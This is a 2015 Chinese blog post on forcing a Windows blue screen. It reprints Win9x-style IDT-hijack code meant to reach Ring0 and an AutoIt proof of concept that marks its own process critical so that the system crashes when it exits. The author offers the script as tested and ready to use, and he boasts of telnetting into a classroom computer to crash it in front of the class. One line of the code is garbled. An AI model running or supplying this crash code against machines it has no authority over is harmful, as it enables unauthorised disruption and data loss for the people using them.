
Blue Screen of Death

我听说KeCheckBugEx可以引发BSOD

于是我就在网上找这个undocumented的函数

后来网上的代码我的确是 找到了 但是不知道怎样获得ring0特权

他们说可以这样做

//VS 2013编译通过
//Windows 8.1 64bit
//运行时访问非法内存

// Payload the author wants executed at Ring0 once the hijacked IDT gate (see GotoRing0/NewInt) fires.
// NOTE(review): the bare `asm` keyword and the `__fastcall TForm1::` handler below are Borland C++ Builder
// syntax; MSVC spells inline assembly `__asm`, so the header's "builds under VS 2013" claim looks doubtful.
void Ring0Proc()  // run your own code at Ring0 (the author's intent)
{
// .......
asm mov eax,CR0;  // try a privileged instruction Ring3 cannot execute: reading CR0 at CPL 3 raises a privileged-instruction fault, so this only survives if the gate hijack really worked
// .......
}

// Replacement interrupt handler that GotoRing0 installs in IDT slot IntNo.
// `naked`: the compiler emits no prologue/epilogue, so the function must leave
// the interrupt frame itself -- hence the explicit iretd instead of a C return.
void  __declspec(naked) NewInt() // new interrupt handler
{
Ring0Proc();   // NOTE(review): a plain call from a naked function relies on the stack being usable by Ring0Proc's own prologue -- confirm for the target compiler
asm  iretd;    // return from the interrupt to the instruction after `int IntNo` in GotoRing0
}
#define   IntNo   9          // IDT vector the code repoints (vector 9 is the legacy "coprocessor segment overrun" slot, unused on modern CPUs)
DWORDLONG   IDTR,SavedGate;  // 8 bytes each: IDTR receives the 6-byte sidt image (limit at +0, linear base at +2); SavedGate keeps the original 8-byte gate for restoration
WORD OurGate[4]={0,0x0028,0xee00,0x0000};  // 32-bit gate descriptor: [0]=offset low (patched at run time), [1]=selector 0x28 (the Ring0 code selector this Win9x-era snippet assumes), [2]=0xEE00 attributes (present, DPL=3, 32-bit interrupt gate), [3]=offset high (patched)
// Attempts a Ring3 -> Ring0 transition by overwriting IDT gate IntNo with a DPL=3 gate that
// points at NewInt, triggering it with `int IntNo`, and then putting the original gate back.
// NOTE(review): this is the classic Win9x trick. On NT-family Windows the IDT base returned by
// sidt is a kernel-mode address, so the user-mode `movsd` write into it faults with an access
// violation before any gate is changed -- which matches the "illegal memory access" the author
// reports on 2003/8.1. The code is 32-bit only (8-byte gates, iretd, inline asm; MSVC x64 has no
// inline assembler), so a 64-bit build cannot even contain it.
void  GotoRing0()
{
asm
{
mov  eax,offset NewInt;          // build our gate: split NewInt's address into the low/high offset words
mov  [OurGate],ax;
shr  eax,16;
mov  [OurGate+6],ax;
sidt fword ptr IDTR;             // store the 6-byte IDTR image; sidt is executable from Ring3 on CPUs/OSes without UMIP
mov  ebx,dword ptr [IDTR+2];     // ebx = linear base of the IDT (a kernel address on NT)
add  ebx,IntNo*8;                // address of gate IntNo (8 bytes per 32-bit gate)
mov  edi,offset SavedGate;       // copy the original gate out (two dword moves; assumes DF is clear)
mov  esi,ebx;
movsd;
movsd;
mov  edi,ebx;                    // overwrite the gate with OurGate -- this write is what faults on NT
mov  esi,offset OurGate;
movsd;
movsd;
int  IntNo;                      // fire the new gate so NewInt runs; control returns here via iretd
mov  edi,ebx;  // start restoring the original interrupt gate
mov  esi,offset SavedGate;
movsd;
movsd;
}
}

// VCL click handler: the button does nothing but kick off the gate-hijack attempt in GotoRing0.
void __fastcall TForm1::Button1Click(TObject *Sender)
{
    (void)Sender;  // the event source is not needed here
    GotoRing0();
}
其他编译器还识别不出asm

GG

....我突然想到是不是fastcall的问题我现在去试一下

//3分钟后

诶卧槽还真是fastcall

上面那段应该可用

我在本地的vs2013上试试(上面的测试是VC++6.0 on Windows Server 2003 Enterprise Edition)

吐槽下VS 还是一如既往的慢

//10分钟后 

还是非法内存 算了还是不试了

说说新发现

本来只是想给我的一个服务写上判断某指定进程是否被挂起

然后网上都说要用NtQuerySystemInformation

昨天花了一个下午

终于把上面那个函数弄出来了

然而 并没有什么卵用

【三岁好累

我再去试了下NtQueryInformationProcess

找了半天

把第一个枚举的弄出来了

结果仔细看了看

除了第一个

其他 好像没有什么我要的东西 【GG

//此乃后话 不表

接着 我就去查一个什么enum成员来着

就看到一个东西

起先我也不知道什么就随便点开来看

然后 竟然有BSOD的页面

我就去把那个程序下载下来

源代码如下:

; Entry point of the sample: enable SeDebugPrivilege, then mark THIS process as critical.
; The elevation below matters because SeDebugPrivilege is only present in an elevated admin token.
#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Change2CUI=y
#AutoIt3Wrapper_Res_Comment=A PoC that will trigger a Blue Screen Of Death
#AutoIt3Wrapper_Res_Description=A PoC that will trigger a Blue Screen Of Death
#AutoIt3Wrapper_Res_Fileversion=1.0.0.0
#AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
; NOTE(review): the manifest above says asInvoker while #RequireAdmin forces an elevated
; re-launch at run time -- the two look inconsistent; confirm which one is intended.
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
; Sample by Joakim Schicht
#include <WinAPI.au3>
; Native structure layouts used by the NtOpenProcess call in _SetProcessCritical.
Global Const $tagOBJECTATTRIBUTES = "ulong Length;hwnd RootDirectory;ptr ObjectName;ulong Attributes;ptr SecurityDescriptor;ptr SecurityQualityOfService"
Global Const $OBJ_CASE_INSENSITIVE = 0x00000040
Global Const $tagUNICODESTRING = "ushort Length;ushort MaximumLength;ptr Buffer" ; declared but not referenced anywhere in this script
; Enable SeDebugPrivilege in our own token. The return value is ignored here; when the
; privilege is not in the token, it is the NtSetInformationProcess call further down that fails.
_SetPrivilege("SeDebugPrivilege")
$ProcId = DllCall("kernel32.dll", "dword", "GetCurrentProcessId") ; DllCall returns an array; element [0] is the PID
If @error Then
ConsoleWrite("GetCurrentProcessId: " & _WinAPI_GetLastErrorMessage() & @CRLF)
Exit
EndIf
ConsoleWrite("PID: " & $ProcId[0] & @CRLF)
; Flag = 1 marks the process critical; neither $Test nor @error is checked afterwards.
$Test = _SetProcessCritical($ProcId[0],1)
; You should now see the Blue Screen Of Death
; (the script ends here, so the now-critical process terminates -- presumably that termination is what raises the bug check)

; Opens process $PID and sets its "break on termination" flag to $Flag through
; NtSetInformationProcess with information class 29 (ProcessBreakOnTermination).
; A process carrying that flag brings the system down with the CRITICAL_PROCESS_DIED
; bug check when it exits -- that is the entire BSOD mechanism of this sample.
; Setting the flag requires SeDebugPrivilege (see _SetPrivilege); without it the
; native call returns an error status and nothing happens.
; Returns: nothing on success (falls off the end, i.e. ""); on failure sets
; @error = 1 and returns the NTSTATUS from the failing call.
; Defender note: the same information class is readable with NtQueryInformationProcess,
; so user-mode processes that have the flag set can be found, and SeDebugPrivilege
; assignment is the control that gates this call.
Func _SetProcessCritical($PID, $Flag)
; NOTE(review): the next three lines are one statement mangled by the page's code widget
; ("4000" is not AutoIt source); read them as: Local $sOA = DllStructCreate($tagOBJECTATTRIBUTES)
Local $sOA = DllStructCreate
4000
($tagOBJECTATTRIBUTES)
DllStructSetData($sOA, "Length", DllStructGetSize($sOA))
DllStructSetData($sOA, "RootDirectory", 0)
DllStructSetData($sOA, "ObjectName", 0)
DllStructSetData($sOA, "Attributes", $OBJ_CASE_INSENSITIVE)
DllStructSetData($sOA, "SecurityDescriptor", 0)
DllStructSetData($sOA, "SecurityQualityOfService", 0)
; CLIENT_ID: only the process id is filled in; the thread id stays 0.
Local $ClientID = DllStructCreate("dword_ptr UniqueProcessId;dword_ptr UniqueThreadId")
DllStructSetData($ClientID, "UniqueProcessId", $PID)
DllStructSetData($ClientID, "UniqueThreadId", 0)
; 0x001F0FFF is the pre-Vista PROCESS_ALL_ACCESS mask. NOTE(review): the NTSTATUS is declared
; as "hwnd" here but as "int" for NtSetInformationProcess below; NT_SUCCESS only copes with
; the pointer-sized form because its upper-bound check catches the zero-extended value -- confirm.
Local $aCall = DllCall("ntdll.dll", "hwnd", "NtOpenProcess", "handle*", 0, "dword", 0x001F0FFF, "struct*", $sOA, "struct*", $ClientID)
If Not NT_SUCCESS($aCall[0]) Then
Return SetError(1, 0, $aCall[0])
Else
$hProcess = $aCall[1] ; handle returned through the "handle*" out-parameter; not declared Local like the others and never closed (no NtClose)
EndIf
LOcal $SpecialStruct = DllStructCreate("dword") ; the ProcessInformation buffer: a single DWORD holding $Flag
DllStructSetData($SpecialStruct,1,$Flag)
$aCall = DllCall("ntdll.dll", "int", "NtSetInformationProcess", "handle", $hProcess, "dword", 29, "ptr", DllStructGetPtr($SpecialStruct),  "dword", DllStructGetSize($SpecialStruct)) ; 29 = ProcessBreakOnTermination
If Not NT_SUCCESS($aCall[0]) Then
ConsoleWrite("Error in NtSetInformationProcess" & @CRLF)
Return SetError(1,0,$aCall[0])
EndIf
EndFunc

; True when $status is in the NTSTATUS success/informational range 0x00000000..0x7FFFFFFF,
; False for warning and error codes (negative as a signed 32-bit value, or above the range).
Func NT_SUCCESS($status)
Return ($status >= 0 And $status <= 0x7FFFFFFF)
EndFunc

; Tries to enable privilege $Privilege (e.g. "SeDebugPrivilege") in the current process token.
; Returns True when AdjustTokenPrivileges itself returned non-zero, False when the token could
; not be opened. NOTE(review): AdjustTokenPrivileges returns non-zero even when the privilege is
; not present in the token (it then sets last error ERROR_NOT_ALL_ASSIGNED, 1300); that case is
; only written to the console here, so a True return does not prove the privilege was enabled.
Func _SetPrivilege($Privilege)
Local $tagLUIDANDATTRIB = "int64 Luid;dword Attributes" ; LUID_AND_ATTRIBUTES: 8 + 4 = 12 bytes, matching the multiplier below
Local $count = 1
Local $tagTOKENPRIVILEGES = "dword PrivilegeCount;byte LUIDandATTRIB[" & $count * 12 & "]" ; count of LUID structs * sizeof LUID struct
Local $TOKEN_ADJUST_PRIVILEGES = 0x20 ; declared but unused: the token is opened with $TOKEN_ALL_ACCESS instead (more access than adjusting privileges needs)
Local $SE_PRIVILEGE_ENABLED = 0x2

Local $curProc = DllCall("kernel32.dll", "ptr", "GetCurrentProcess")
; NOTE(review): $TOKEN_ALL_ACCESS is not declared in this file; presumably it comes in through WinAPI.au3's includes -- verify.
Local $call = DllCall("advapi32.dll", "int", "OpenProcessToken", "ptr", $curProc[0], "dword", $TOKEN_ALL_ACCESS, "ptr*", "")
If Not $call[0] Then Return False
Local $hToken = $call[3]

; Result of LookupPrivilegeValue is not checked; on failure $iLuid is left as whatever the out-param holds.
$call = DllCall("advapi32.dll", "int", "LookupPrivilegeValue", "str", "", "str", $Privilege, "int64*", "")
Local $iLuid = $call[3]

Local $TP = DllStructCreate($tagTOKENPRIVILEGES)
Local $TPout = DllStructCreate($tagTOKENPRIVILEGES) ; receives the previous state of the privilege
Local $LUID = DllStructCreate($tagLUIDANDATTRIB, DllStructGetPtr($TP, "LUIDandATTRIB")) ; overlays the LUID_AND_ATTRIBUTES entry inside $TP

DllStructSetData($TP, "PrivilegeCount", $count)
DllStructSetData($LUID, "Luid", $iLuid)
DllStructSetData($LUID, "Attributes", $SE_PRIVILEGE_ENABLED)

$call = DllCall("advapi32.dll", "int", "AdjustTokenPrivileges", "ptr", $hToken, "int", 0, "ptr", DllStructGetPtr($TP), "dword", DllStructGetSize($TPout), "ptr", DllStructGetPtr($TPout), "dword*", 0)
$lasterror = _WinAPI_GetLastError() ; read immediately after the call so the value belongs to AdjustTokenPrivileges; not declared Local like the others
If $lasterror <> 0 Then
ConsoleWrite("AdjustTokenPrivileges: " & _WinAPI_GetLastErrorMessage() & @CRLF)
EndIf
DllCall("kernel32.dll", "int", "CloseHandle", "ptr", $hToken)
Return ($call[0] <> 0) ; $call[0] <> 0 is success
EndFunc


代码片好像插不了??将就看看吧

后缀名是.au3

下载地址是【好像不用翻*

要求管理员权限

反正就能直接用啦 亲测可用hhhhhhhhh

上课的时候可用telnet 遥控到教室电脑然后命令行调用

反正用的是本地监视器

所以 全班人都看得到咯hhhh

先到这傲 我还要去找情头

by:Mactvish

Copyright Mactvish

转载请注明出处

May 30th, 2015